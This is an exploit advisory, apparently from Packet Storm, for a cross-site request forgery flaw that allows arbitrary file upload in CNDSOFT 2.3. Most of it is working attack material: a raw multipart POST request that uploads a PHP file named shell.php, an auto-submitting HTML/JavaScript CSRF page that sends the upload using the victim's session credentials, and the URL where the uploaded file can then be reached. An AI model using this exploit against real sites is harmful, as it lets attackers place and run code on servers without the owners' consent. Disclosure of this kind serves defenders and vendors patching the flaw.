CNDSOFT 2.3 Cross Site Request Forgery / Shell Upload

2016-10-20T00:00:00
ID PACKETSTORM:139273
Type packetstorm
Reporter Besim
Modified 2016-10-20T00:00:00

Description

                                        
                                            `*=========================================================================================================  
# Exploit Title: CNDSOFT 2.3 - Arbitrary File Upload with CSRF (shell.php)  
# Author: Besim  
# Google Dork: -  
# Date: 19/10/2016  
# Type: webapps  
# Platform : PHP  
# Vendor Homepage: -  
# Software Link: http://www.phpexplorer.com/Goster/1227  
# Version: 2.3  
*=========================================================================================================  
  
  
Vulnerable URL and Parameter  
========================================  
  
Vulnerable URL = http://www.site_name/path/ofis/index.php?is=kullanici_tanimla  
  
Vulnerable Parameter = &mesaj_baslik  
  
  
TECHNICAL DETAILS & POC & POST DATA  
========================================  
  
POST /ofis/index.php?is=kullanici_tanimla HTTP/1.1  
Host: localhost:8081  
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0)  
Gecko/20100101 Firefox/49.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: http://site_name/ofis/index.php?is=kullanici_tanimla  
aa  
Content-Type: multipart/form-data;  
boundary=---------------------------5035863528338  
Content-Length: 1037  
  
-----------------------------5035863528338  
Content-Disposition: form-data; name="utf8"  
  
a  
-----------------------------5035863528338  
Content-Disposition: form-data; name="authenticity_token"  
  
CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=  
-----------------------------5035863528338  
Content-Disposition: form-data; name="kullanici_adi"  
  
meryem  
-----------------------------5035863528338  
Content-Disposition: form-data; name="kullanici_sifresi"  
  
meryem  
-----------------------------5035863528338  
Content-Disposition: form-data; name="kullanici_mail_adresi"  
m@yop.com  
-----------------------------5035863528338  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
  
30000  
-----------------------------5035863528338  
Content-Disposition: form-data; name="*kullanici_resmi*"; *filename*="shell.php"  
Content-Type: application/octet-stream  
*<?php  
phpinfo();  
  
?>*  
-----------------------------5035863528338  
Content-Disposition: form-data; name="personel_maasi"  
  
5200  
-----------------------------5035863528338--  
  
  
*CSRF PoC - File Upload (Shell.php)*  
  
========================================  
  
<html>  
<!-- CSRF PoC -->  
<body>  
<script>  
function submitRequest()  
{  
var xhr = new XMLHttpRequest();  
xhr.open("POST", "  
http://site_name/ofis/index.php?is=kullanici_tanimla", true);  
xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8");  
xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");  
xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------5035863528338");  
xhr.withCredentials = true;  
var body = "-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"utf8\"\r\n" +  
"\r\n" +  
"\xe2\x9c\x93\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"authenticity_token\"\r\n"  
+  
"\r\n" +  
"CFC7d00LWKQsSahRqsfD+e/mHLqbaVIXBvlBGe/KP+I=\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"kullanici_adi\"\r\n" +  
"\r\n" +  
"meryem\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"kullanici_sifresi\"\r\n"  
+  
"\r\n" +  
"meryem\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"kullanici_mail_adresi\"\r\n" +  
"\r\n" +  
"m@yop.com\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"MAX_FILE_SIZE\"\r\n" +  
"\r\n" +  
"30000\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"kullanici_resmi\"; filename=\"shell.php\"\r\n" +  
"Content-Type: application/octet-stream\r\n" +  
"\r\n" +  
"\x3c?php \r\n" +  
"\tphpinfo();\r\n" +  
"\r\n" +  
" ?\x3e\r\n" +  
"-----------------------------5035863528338\r\n" +  
"Content-Disposition: form-data; name=\"personel_maasi\"\r\n" +  
"\r\n" +  
"5200\r\n" +  
"-----------------------------5035863528338--\r\n";  
var aBody = new Uint8Array(body.length);  
for (var i = 0; i < aBody.length; i++)  
aBody[i] = body.charCodeAt(i);  
xhr.send(new Blob([aBody]));  
}  
submitRequest();  
</script>  
<form action="#">  
<input type="button" value="Submit request"  
onclick="submitRequest();" />  
</form>  
</body>  
</html>  
  
========================================  
  
*Access File : *http://www.site_name/path/personel_resimleri/shell.php  
  
  
RISK  
========================================  
  
Attacker can arbitrary file upload.  
  
  
--  
  
Besim ALTINOK  
  
  
`